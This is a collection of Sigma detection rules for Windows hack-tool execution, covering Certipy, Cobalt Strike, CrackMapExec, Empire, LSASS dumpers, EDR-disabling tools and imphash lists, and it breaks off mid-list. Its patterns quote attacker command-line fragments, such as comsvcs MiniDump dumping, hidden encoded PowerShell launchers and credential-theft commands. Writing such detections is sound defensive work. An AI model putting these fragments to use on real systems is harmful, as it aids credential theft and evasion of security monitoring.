    "path": "rules/windows/process_creation/proc_creation_win_hktl_certify.yml",
    "content": "title: HackTool - Certify Execution\nid: 762f2482-ff21-4970-8939-0aa317a886bb\nstatus: test\ndescription: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments.\nreferences:\n    - https://github.com/GhostPack/Certify\nauthor: pH-T (Nextron Systems)\ndate: 2023-04-17\nmodified: 2023-04-25\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Certify.exe'\n        - OriginalFileName: 'Certify.exe'\n        - Description|contains: 'Certify'\n    selection_cli_commands:\n        CommandLine|contains:\n            - '.exe cas '\n            - '.exe find '\n            - '.exe pkiobjects '\n            - '.exe request '\n            - '.exe download '\n    selection_cli_options:\n        CommandLine|contains:\n            - ' /vulnerable'\n            - ' /template:'\n            - ' /altname:'\n            - ' /domain:'\n            - ' /path:'\n            - ' /ca:'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_certipy.yml",
    "content": "title: HackTool - Certipy Execution\nid: 6938366d-8954-4ddc-baff-c830b3ba8fcd\nstatus: test\ndescription: |\n    Detects Certipy execution, a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments.\nreferences:\n    - https://github.com/ly4k/Certipy\n    - https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7\nauthor: pH-T (Nextron Systems), Sittikorn Sangrattanapitak\ndate: 2023-04-17\nmodified: 2024-10-08\ntags:\n    - attack.discovery\n    - attack.credential-access\n    - attack.t1649\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\Certipy.exe'\n        - OriginalFileName: 'Certipy.exe'\n        - Description|contains: 'Certipy'\n    selection_cli_commands:\n        CommandLine|contains:\n            - ' account '\n            - ' auth '\n            # - ' ca ' # Too short to be used with just one CLI\n            - ' cert '\n            - ' find '\n            - ' forge '\n            - ' ptt '\n            - ' relay '\n            - ' req '\n            - ' shadow '\n            - ' template '\n    selection_cli_flags:\n        CommandLine|contains:\n            - ' -bloodhound'\n            - ' -ca-pfx '\n            - ' -dc-ip '\n            - ' -kirbi'\n            - ' -old-bloodhound'\n            - ' -pfx '\n            - ' -target'\n            - ' -template'\n            - ' -username '\n            - ' -vulnerable'\n            - 'auth -pfx'\n            - 'shadow auto'\n            - 'shadow list'\n    condition: selection_img or all of selection_cli_*\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml",
    "content": "title: Operator Bloopers Cobalt Strike Commands\nid: 647c7b9e-d784-4fda-b9a0-45c565a7b729\nrelated:\n    - id: 4f154fb6-27d1-4813-a759-78b93e0b9c48\n      type: similar\nstatus: test\ndescription: Detects use of Cobalt Strike commands accidentally entered in the CMD shell\nreferences:\n    - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf\n    - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n    - https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nauthor: _pete_0, TheDFIRReport\ndate: 2022-05-06\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.003\n    - stp.1u\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|startswith:\n            - 'cmd '\n            - 'cmd.exe'\n            - 'c:\\windows\\system32\\cmd.exe'\n        CommandLine|contains:\n            - 'psinject'\n            - 'spawnas'\n            - 'make_token'\n            - 'remote-exec'\n            - 'rev2self'\n            - 'dcsync'\n            - 'logonpasswords'\n            - 'execute-assembly'\n            - 'getsystem'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml",
    "content": "title: Operator Bloopers Cobalt Strike Modules\nid: 4f154fb6-27d1-4813-a759-78b93e0b9c48\nrelated:\n    - id: 647c7b9e-d784-4fda-b9a0-45c565a7b729\n      type: similar\nstatus: test\ndescription: Detects Cobalt Strike module/commands accidentally entered in CMD shell\nreferences:\n    - https://hstechdocs.helpsystems.com/manuals/cobaltstrike/current/userguide/content/cobalt-4-5-user-guide.pdf\n    - https://thedfirreport.com/2021/10/04/bazarloader-and-the-conti-leaks/\n    - https://thedfirreport.com/2022/06/16/sans-ransomware-summit-2022-can-you-detect-this/\nauthor: _pete_0, TheDFIRReport\ndate: 2022-05-06\nmodified: 2023-01-30\ntags:\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - OriginalFileName: 'Cmd.Exe'\n        - Image|endswith: '\\cmd.exe'\n    selection_cli:\n        CommandLine|contains:\n            - 'Invoke-UserHunter'\n            - 'Invoke-ShareFinder'\n            - 'Invoke-Kerberoast'\n            - 'Invoke-SMBAutoBrute'\n            - 'Invoke-Nightmare'\n            - 'zerologon'\n            - 'av_query'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml",
    "content": "title: CobaltStrike Load by Rundll32\nid: ae9c6a7c-9521-42a6-915e-5aaa8689d529\nstatus: test\ndescription: Rundll32 can be use by Cobalt Strike with StartW function to load DLLs from the command line.\nreferences:\n    - https://www.cobaltstrike.com/help-windows-executable\n    - https://redcanary.com/threat-detection-report/\n    - https://thedfirreport.com/2020/10/18/ryuk-in-5-hours/\nauthor: Wojciech Lesicki\ndate: 2021-06-01\nmodified: 2022-09-16\ntags:\n    - attack.defense-evasion\n    - attack.t1218.011\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_rundll:\n        - Image|endswith: '\\rundll32.exe'\n        - OriginalFileName: RUNDLL32.EXE\n        - CommandLine|contains:\n              - 'rundll32.exe'\n              - 'rundll32 '\n    selection_params:\n        CommandLine|contains: '.dll'\n        CommandLine|endswith:\n            - ' StartW'\n            - ',StartW'\n    condition: all of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_cobaltstrike_process_patterns.yml",
    "content": "title: Potential CobaltStrike Process Patterns\nid: f35c5d71-b489-4e22-a115-f003df287317\nstatus: test\ndescription: Detects potential process patterns related to Cobalt Strike beacon activity\nreferences:\n    - https://hausec.com/2021/07/26/cobalt-strike-and-tradecraft/\n    - https://thedfirreport.com/2021/08/29/cobalt-strike-a-defenders-guide/\nauthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)\ndate: 2021-07-27\nmodified: 2023-03-29\ntags:\n    - attack.execution\n    - attack.t1059\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_generic_1:\n        CommandLine|endswith: 'cmd.exe /C whoami'\n        ParentImage|startswith: 'C:\\Temp\\'\n    selection_generic_2:\n        ParentImage|endswith:\n            - '\\runonce.exe'\n            - '\\dllhost.exe'\n        CommandLine|contains|all:\n            - 'cmd.exe /c echo'\n            - '> \\\\\\\\.\\\\pipe'\n    selection_conhost_1:\n        ParentCommandLine|contains|all:\n            - 'cmd.exe /C echo'\n            - ' > \\\\\\\\.\\\\pipe'\n        CommandLine|endswith: 'conhost.exe 0xffffffff -ForceV1'\n    selection_conhost_2:\n        ParentCommandLine|endswith: '/C whoami'\n        CommandLine|endswith: 'conhost.exe 0xffffffff -ForceV1'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_coercedpotato.yml",
    "content": "title: HackTool - CoercedPotato Execution\nid: e8d34729-86a4-4140-adfd-0a29c2106307\nstatus: test\ndescription: Detects the use of CoercedPotato, a tool for privilege escalation\nreferences:\n    - https://github.com/hackvens/CoercedPotato\n    - https://blog.hackvens.fr/articles/CoercedPotato.html\nauthor: Florian Roth (Nextron Systems)\ndate: 2023-10-11\nmodified: 2024-11-23\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_loader_img:\n        Image|endswith: '\\CoercedPotato.exe'\n    selection_params:\n        CommandLine|contains: ' --exploitId '\n    selection_loader_imphash:\n        Hashes|contains:\n            - 'IMPHASH=A75D7669DB6B2E107A44C4057FF7F7D6'\n            - 'IMPHASH=F91624350E2C678C5DCBE5E1F24E22C9'\n            - 'IMPHASH=14C81850A079A87E83D50CA41C709A15'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_covenant.yml",
    "content": "title: HackTool - Covenant PowerShell Launcher\nid: c260b6db-48ba-4b4a-a76f-2f67644e99d2\nstatus: test\ndescription: Detects suspicious command lines used in Covenant luanchers\nreferences:\n    - https://posts.specterops.io/covenant-v0-5-eee0507b85ba\nauthor: Florian Roth (Nextron Systems), Jonhnathan Ribeiro, oscd.community\ndate: 2020-06-04\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.t1059.001\n    - attack.t1564.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_1:\n        CommandLine|contains|all:\n            - '-Sta'\n            - '-Nop'\n            - '-Window'\n            - 'Hidden'\n        CommandLine|contains:\n            - '-Command'\n            - '-EncodedCommand'\n    selection_2:\n        CommandLine|contains:\n            - 'sv o (New-Object IO.MemorySteam);sv d '\n            - 'mshta file.hta'\n            - 'GruntHTTP'\n            - '-EncodedCommand cwB2ACAAbwAgA'\n    condition: 1 of selection_*\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution.yml",
    "content": "title: HackTool - CrackMapExec Execution\nid: 42a993dd-bb3e-48c8-b372-4d6684c4106c\nstatus: test\ndescription: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced.\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/authentication/checking-credentials-local\n    - https://www.mandiant.com/resources/telegram-malware-iranian-espionage\n    - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=mssql-mimikatz\n    - https://www.infosecmatter.com/crackmapexec-module-library/?cmem=smb-pe_inject\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-02-25\nmodified: 2023-03-08\ntags:\n    - attack.execution\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.credential-access\n    - attack.discovery\n    - attack.t1047\n    - attack.t1053\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.t1110\n    - attack.t1201\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_binary:\n        Image|endswith: '\\crackmapexec.exe'\n    selection_special:\n        CommandLine|contains: ' -M pe_inject '\n    selection_execute:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -x '\n    selection_hash:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -p '\n            - \" -H 'NTHASH'\"\n    selection_module_mssql:\n        CommandLine|contains|all:\n            - ' mssql '\n            - ' -u '\n            - ' -p '\n            - ' -M '\n            - ' -d '\n    selection_module_smb1:\n        CommandLine|contains|all:\n            - ' smb '\n            - ' -u '\n            - ' -H '\n            - ' -M '\n            - ' -o '\n    selection_module_smb2:\n        CommandLine|contains|all:\n            - ' smb '\n            - ' -u '\n            - ' -p '\n            - ' --local-auth'\n    part_localauth_1:\n        CommandLine|contains|all:\n            - ' --local-auth'\n            - ' -u '\n            - ' -p '\n    part_localauth_2:\n        CommandLine|contains|all:\n            - ' 10.'\n            - ' 192.168.'\n            - '/24 '\n    condition: 1 of selection_* or all of part_localauth*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_execution_patterns.yml",
    "content": "title: HackTool - CrackMapExec Execution Patterns\nid: 058f4380-962d-40a5-afce-50207d36d7e2\nstatus: stable\ndescription: Detects various execution patterns of the CrackMapExec pentesting framework\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec\nauthor: Thomas Patzke\ndate: 2020-05-22\nmodified: 2023-11-06\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.t1047\n    - attack.t1053\n    - attack.t1059.003\n    - attack.t1059.001\n    - attack.s0106\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            # cme/protocols/smb/wmiexec.py (generalized execute_remote and execute_fileless)\n            - 'cmd.exe /Q /c * 1> \\\\\\\\*\\\\*\\\\* 2>&1'\n            # cme/protocols/smb/atexec.py:109 (fileless output via share)\n            - 'cmd.exe /C * > \\\\\\\\*\\\\*\\\\* 2>&1'\n            # cme/protocols/smb/atexec.py:111 (fileless output via share)\n            - 'cmd.exe /C * > *\\\\Temp\\\\* 2>&1'\n            # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L136 (PowerShell execution with obfuscation)\n            - 'powershell.exe -exec bypass -noni -nop -w 1 -C \"'\n            # https://github.com/byt3bl33d3r/CrackMapExec/blob/d8c50c8cbaf36c29329078662473f75e440978d2/cme/helpers/powershell.py#L160 (PowerShell execution without obfuscation)\n            - 'powershell.exe -noni -nop -w 1 -enc '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_patterns.yml",
    "content": "title: HackTool - CrackMapExec Process Patterns\nid: f26307d8-14cd-47e3-a26b-4b4769f24af6\nstatus: test\ndescription: Detects suspicious process patterns found in logs when CrackMapExec is used\nreferences:\n    - https://mpgn.gitbook.io/crackmapexec/smb-protocol/obtaining-credentials/dump-lsass\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-12\nmodified: 2023-02-13\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    product: windows\n    category: process_creation\ndetection:\n    selection_lsass_dump1:\n        CommandLine|contains|all:\n            - 'tasklist /fi '\n            - 'Imagename eq lsass.exe'\n        CommandLine|contains:\n            - 'cmd.exe /c '\n            - 'cmd.exe /r '\n            - 'cmd.exe /k '\n            - 'cmd /c '\n            - 'cmd /r '\n            - 'cmd /k '\n        User|contains: # covers many language settings\n            - 'AUTHORI'\n            - 'AUTORI'\n    selection_lsass_dump2:\n        CommandLine|contains|all:\n            - 'do rundll32.exe C:\\windows\\System32\\comsvcs.dll, MiniDump'\n            - '\\Windows\\Temp\\'\n            - ' full'\n            - '%%B'\n    selection_procdump:\n        CommandLine|contains|all:\n            - 'tasklist /v /fo csv'\n            - 'findstr /i \"lsass\"'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml",
    "content": "title: HackTool - CrackMapExec PowerShell Obfuscation\nid: 6f8b3439-a203-45dc-a88b-abf57ea15ccf\nstatus: test\ndescription: The CrachMapExec pentesting framework implements a PowerShell obfuscation with some static strings detected by this rule.\nreferences:\n    - https://github.com/byt3bl33d3r/CrackMapExec\n    - https://github.com/byt3bl33d3r/CrackMapExec/blob/0a49f75347b625e81ee6aa8c33d3970b5515ea9e/cme/helpers/powershell.py#L242\nauthor: Thomas Patzke\ndate: 2020-05-22\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\n    - attack.defense-evasion\n    - attack.t1027.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n        - OriginalFileName:\n              - 'PowerShell.EXE'\n              - 'pwsh.dll'\n    selection_cli:\n        CommandLine|contains:\n            - 'join*split'\n            # Line 343ff\n            - '( $ShellId[1]+$ShellId[13]+''x'')'\n            - '( $PSHome[*]+$PSHOME[*]+'\n            - '( $env:Public[13]+$env:Public[5]+''x'')'\n            - '( $env:ComSpec[4,*,25]-Join'''')'\n            - '[1,3]+''x''-Join'''')'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_createminidump.yml",
    "content": "title: HackTool - CreateMiniDump Execution\nid: 36d88494-1d43-4dc0-b3fa-35c8fea0ca9d\nstatus: test\ndescription: Detects the use of CreateMiniDump hack tool used to dump the LSASS process memory for credential extraction on the attacker's machine\nreferences:\n    - https://ired.team/offensive-security/credential-access-and-credential-dumping/dumping-lsass-passwords-without-mimikatz-minidumpwritedump-av-signature-bypass\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-12-22\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\CreateMiniDump.exe'\n        - Hashes|contains: 'IMPHASH=4a07f944a83e8a7c2525efa35dd30e2f'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_dinjector.yml",
    "content": "title: HackTool - DInjector PowerShell Cradle Execution\nid: d78b5d61-187d-44b6-bf02-93486a80de5a\nstatus: test\ndescription: Detects the use of the Dinject PowerShell cradle based on the specific flags\nreferences:\n    - https://web.archive.org/web/20211001064856/https://github.com/snovvcrash/DInjector # Original got deleted. This is a fork\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-12-07\nmodified: 2023-02-04\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1055\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - ' /am51'\n            - ' /password'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_doppelganger.yml",
    "content": "title: HackTool - Doppelanger LSASS Dumper Execution\nid: d474c8fe-bb69-4ea0-b7d9-f682b56d52d3\nstatus: experimental\ndescription: Detects the execution of the Doppelanger hacktool which is used to dump LSASS memory via process cloning while evading common detection methods\nreferences:\n    - https://labs.yarix.com/2025/06/doppelganger-an-advanced-lsass-dumper-with-process-cloning/\n    - https://github.com/vari-sh/RedTeamGrimoire/tree/668e0357072546065729ad623f8c02f7be21bb08/Doppelganger\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-07-01\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\Doppelganger.exe'\n        - Hashes|contains:\n              - 'IMPHASH=AB94D5217896ADCD765A06B2D52F0AEB'\n              - 'IMPHASH=65F0EA61156EE0C2A35421926F0C7F78'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_dumpert.yml",
    "content": "title: HackTool - Dumpert Process Dumper Execution\nid: 2704ab9e-afe2-4854-a3b1-0c0706d03578\nstatus: test\ndescription: Detects the use of Dumpert process dumper, which dumps the lsass.exe process memory\nreferences:\n    - https://github.com/outflanknl/Dumpert\n    - https://unit42.paloaltonetworks.com/actors-still-exploiting-sharepoint-vulnerability/\nauthor: Florian Roth (Nextron Systems)\ndate: 2020-02-04\nmodified: 2025-01-22\ntags:\n    - attack.credential-access\n    - attack.t1003.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Hashes|contains: 'MD5=09D278F9DE118EF09163C6140255C690'\n        - CommandLine|contains: 'Dumpert.dll'\n    condition: selection\nfalsepositives:\n    - Very unlikely\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_edr_freeze.yml",
    "content": "title: Hacktool - EDR-Freeze Execution\nid: c598cc0c-9e70-4852-b9eb-8921af79f598\nstatus: experimental\ndescription: |\n    Detects execution of EDR-Freeze, a tool that exploits the MiniDumpWriteDump function and WerFaultSecure.exe to suspend EDR and Antivirus processes on Windows.\n    EDR-Freeze leverages a race-condition attack to put security processes into a dormant state by suspending WerFaultSecure at the moment it freezes the target process.\n    This technique does not require kernel-level exploits or BYOVD, but instead abuses user-mode functionality to temporarily disable monitoring by EDR or Antimalware solutions.\nreferences:\n    - https://www.zerosalarium.com/2025/09/EDR-Freeze-Puts-EDRs-Antivirus-Into-Coma.html\n    - https://github.com/TwoSevenOneT/EDR-Freeze\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-09-24\nmodified: 2025-11-27\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        Image|contains:\n            - '\\EDR-Freeze'\n            - '\\EDRFreeze'\n        Image|endswith: '.exe'\n    selection_imphash:\n        Hashes|contains:\n            - 'IMPHASH=1195F7935954A2CD09157390C33F8E8C'\n            - 'IMPHASH=129F58DE3D687FB7F012BF6C3D679997'\n            - 'IMPHASH=2C617A175D0086251642C6619F7CC8BA'\n            - 'IMPHASH=8828F0B906F7844358FB92A899E9520F'\n            - 'IMPHASH=AF76D95157EC554DC1EF178E4E66D447'\n            - 'IMPHASH=E1B04316B61ACA31DD52ABBEC0A37FD5'\n            - 'IMPHASH=8B2D5B54AFCFEC60D54F6B31D80ED4A0'\n            - 'IMPHASH=AB8BB31EDD91D2A05FE7B62A535E9EB7'\n    condition: 1 of selection_*\nfalsepositives:\n    - Unlikely\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_hktl_edr_freeze/info.yml\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_edrsilencer.yml",
    "content": "title: HackTool - EDRSilencer Execution\nid: eb2d07d4-49cb-4523-801a-da002df36602\nstatus: test\ndescription: |\n    Detects the execution of EDRSilencer, a tool that leverages Windows Filtering Platform (WFP) to block Endpoint Detection and Response (EDR) agents from reporting security events to the server based on PE metadata information.\nreferences:\n    - https://github.com/netero1010/EDRSilencer\nauthor: '@gott_cyber'\ndate: 2024-01-02\ntags:\n    - attack.defense-evasion\n    - attack.t1562\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Image|endswith: '\\EDRSilencer.exe'\n        - OriginalFileName: 'EDRSilencer.exe'\n        - Description|contains: 'EDRSilencer'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_launch.yml",
    "content": "title: HackTool - Empire PowerShell Launch Parameters\nid: 79f4ede3-402e-41c8-bc3e-ebbf5f162581\nstatus: test\ndescription: Detects suspicious powershell command line parameters used in Empire\nreferences:\n    - https://github.com/EmpireProject/Empire/blob/c2ba61ca8d2031dad0cfc1d5770ba723e8b710db/lib/common/helpers.py#L165\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/deaduser.py#L191\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/lib/modules/powershell/persistence/powerbreach/resolver.py#L178\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\nauthor: Florian Roth (Nextron Systems)\ndate: 2019-04-20\nmodified: 2023-02-21\ntags:\n    - attack.execution\n    - attack.t1059.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -NoP -sta -NonI -W Hidden -Enc '\n            - ' -noP -sta -w 1 -enc '\n            - ' -NoP -NonI -W Hidden -enc '\n            - ' -noP -sta -w 1 -enc'\n            - ' -enc  SQB'\n            - ' -nop -exec bypass -EncodedCommand '\n    condition: selection\nfalsepositives:\n    - Other tools that incidentally use the same command line parameters\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_empire_powershell_uac_bypass.yml",
    "content": "title: HackTool - Empire PowerShell UAC Bypass\nid: 3268b746-88d8-4cd3-bffc-30077d02c787\nstatus: stable\ndescription: Detects some Empire PowerShell UAC bypass methods\nreferences:\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-EventVwrBypass.ps1#L64\n    - https://github.com/EmpireProject/Empire/blob/e37fb2eef8ff8f5a0a689f1589f424906fe13055/data/module_source/privesc/Invoke-FodHelperBypass.ps1#L64\nauthor: Ecco\ndate: 2019-08-30\nmodified: 2023-02-21\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains:\n            - ' -NoP -NonI -w Hidden -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update)'\n            - ' -NoP -NonI -c $x=$((gp HKCU:Software\\Microsoft\\Windows Update).Update);'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_evil_winrm.yml",
    "content": "title: HackTool - WinRM Access Via Evil-WinRM\nid: a197e378-d31b-41c0-9635-cfdf1c1bb423\nstatus: test\ndescription: Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1021.006/T1021.006.md#atomic-test-3---winrm-access-with-evil-winrm\n    - https://github.com/Hackplayers/evil-winrm\nauthor: frack113\ndate: 2022-01-07\nmodified: 2023-02-13\ntags:\n    - attack.lateral-movement\n    - attack.t1021.006\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\ruby.exe'\n        CommandLine|contains|all:\n            - '-i '\n            - '-u '\n            - '-p '\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_hktl_execution_via_imphashes.yml",
    "content": "title: Hacktool Execution - Imphash\nid: 24e3e58a-646b-4b50-adef-02ef935b9fc8\nstatus: test\ndescription: Detects the execution of different Windows based hacktools via their import hash (imphash) even if the files have been renamed\nreferences:\n    - Internal Research\nauthor: Florian Roth (Nextron Systems)\ndate: 2022-03-04\nmodified: 2024-11-23\ntags:\n    - attack.credential-access\n    - attack.resource-development\n    - attack.t1588.002\n    - attack.t1003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Hashes|contains: # Sysmon field hashes contains all types\n            - IMPHASH=BCCA3C247B619DCD13C8CDFF5F123932 # PetitPotam\n            - IMPHASH=3A19059BD7688CB88E70005F18EFC439 # PetitPotam\n            - IMPHASH=bf6223a49e45d99094406777eb6004ba # PetitPotam\n            - IMPHASH=23867A89C2B8FC733BE6CF5EF902F2D1 # JuicyPotato\n            - IMPHASH=A37FF327F8D48E8A4D2F757E1B6E70BC # JuicyPotato\n            - IMPHASH=F9A28C458284584A93B14216308D31BD # JuicyPotatoNG\n            - IMPHASH=6118619783FC175BC7EBECFF0769B46E # RoguePotato\n            - IMPHASH=959A83047E80AB68B368FDB3F4C6E4EA # RoguePotato\n            - IMPHASH=563233BFA169ACC7892451F71AD5850A # RoguePotato\n            - IMPHASH=87575CB7A0E0700EB37F2E3668671A08 # RoguePotato\n            - IMPHASH=13F08707F759AF6003837A150A371BA1 # Pwdump\n            - IMPHASH=1781F06048A7E58B323F0B9259BE798B # Pwdump\n            - IMPHASH=233F85F2D4BC9D6521A6CAAE11A1E7F5 # Pwdump\n            - IMPHASH=24AF2584CBF4D60BBE5C6D1B31B3BE6D # Pwdump\n            - IMPHASH=632969DDF6DBF4E0F53424B75E4B91F2 # Pwdump\n            - IMPHASH=713C29B396B907ED71A72482759ED757 # Pwdump\n            - IMPHASH=749A7BB1F0B4C4455949C0B2BF7F9E9F # Pwdump\n            - IMPHASH=8628B2608957A6B0C6330AC3DE28CE2E # Pwdump\n            - IMPHASH=8B114550386E31895DFAB371E741123D # Pwdump\n            - IMPHASH=94CB940A1A6B65BED4D5A8F849CE9793 # PwDumpX\n            - IMPHASH=9D68781980370E00E0BD939EE5E6C141 # Pwdump\n            - IMPHASH=B18A1401FF8F444056D29450FBC0A6CE # Pwdump\n            - IMPHASH=CB567F9498452721D77A451374955F5F # Pwdump\n            - IMPHASH=730073214094CD328547BF1F72289752 # Htran\n            - IMPHASH=17B461A082950FC6332228572138B80C # Cobalt Strike beacons\n            - IMPHASH=DC25EE78E2EF4D36FAA0BADF1E7461C9 # Cobalt Strike beacons\n            - IMPHASH=819B19D53CA6736448F9325A85736792 # Cobalt Strike beacons\n            - IMPHASH=829DA329CE140D873B4A8BDE2CBFAA7E # Cobalt Strike beacons\n            - IMPHASH=C547F2E66061A8DFFB6F5A3FF63C0A74 # PPLDump\n            - IMPHASH=0588081AB0E63BA785938467E1B10CCA # PPLDump\n            - IMPHASH=0D9EC08BAC6C07D9987DFD0F1506587C # NanoDump\n            - 